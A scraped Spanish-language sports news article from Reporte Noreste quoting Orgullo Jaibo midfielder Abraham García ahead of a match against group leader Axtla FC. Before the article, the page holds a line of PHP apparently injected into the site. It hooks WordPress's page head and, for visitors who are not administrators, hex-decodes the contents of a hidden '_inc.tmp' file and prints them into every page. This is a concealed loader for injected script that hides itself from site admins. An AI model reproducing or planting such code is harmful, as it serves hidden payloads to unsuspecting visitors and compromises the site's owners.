if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } «Es un rival complicado pero no invencible, vamos a sacar el resultado»: Abraham García – Reporte Noreste
Conéctate con nosotros

Deportes

«Es un rival complicado pero no invencible, vamos a sacar el resultado»: Abraham García

«Es un rival complicado pero no invencible, vamos a sacar el resultado»: Abraham García

Abraham García, mediocampista de Orgullo Jaibo declaró que buscan remediar la situación ante Axtla, esto tras empatar a un gol en casa el pasado fin de semana ante Petroleros de Poza Rica.

«Si, es un resultado que bueno lo teníamos pero se complicó y no pasa nada, hay que remediarlo este fin de semana»; declaró.

García reconoció que es un rival complicado en el grupo por lo que buscarán traerse la victoria a casa para seguir sumando en la tabla. Axtla FC se encuentra en el primer lugar de la tabla y Orgullo SURTAM en la cuarta posición.

«Es un rival complicado pero no invencible, así que se va a luchar y bueno vamos a sacar el resultado que es lo que queremos para seguir sumando puntos y para terminar arriba en la tabla»; mencionó.

El número 22 de Orgullo Jaibo marcó el gol que pondría al frente en el marcador al conjunto celeste el cual tuvo una dedicatoria especial tras el fallecimiento de su abuela días anteriores del partido.

«Si, la verdad que fue un gol muy especial para mí, le metí mucho corazón con ese gol y bueno espero que lo hayan disfrutado tanto mi familia como mis compañeros y todo el equipo que ayudo a sacar al menos un punto del partido y bueno hay que seguir sumando».

El mediocampista destacó el entrenamiento que tuvieron durante la semana bajo el mando de Francisco Fernández y Héctor del Ángel el cual los ayudará a enfrentar de mejor manera el partido del día de mañana.

«Fue un entrenamiento muy bueno, sabemos que tenemos que ir a Axtla a ganar, entonces nos preparamos de la mejor manera para sacar un buen resultado».

Por último invitó a toda a afición de la zona sur de Tamaulipas a que los siguieran apoyando durante los partidos que sostengan ya sea de local o visitante.

«Que nos sigan apoyando, por qué es importante el apoyo de la afición, nosotros le vamos a seguir metiendo, esperamos que siga el apoyo de toda la gente»; finalizó.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Deportes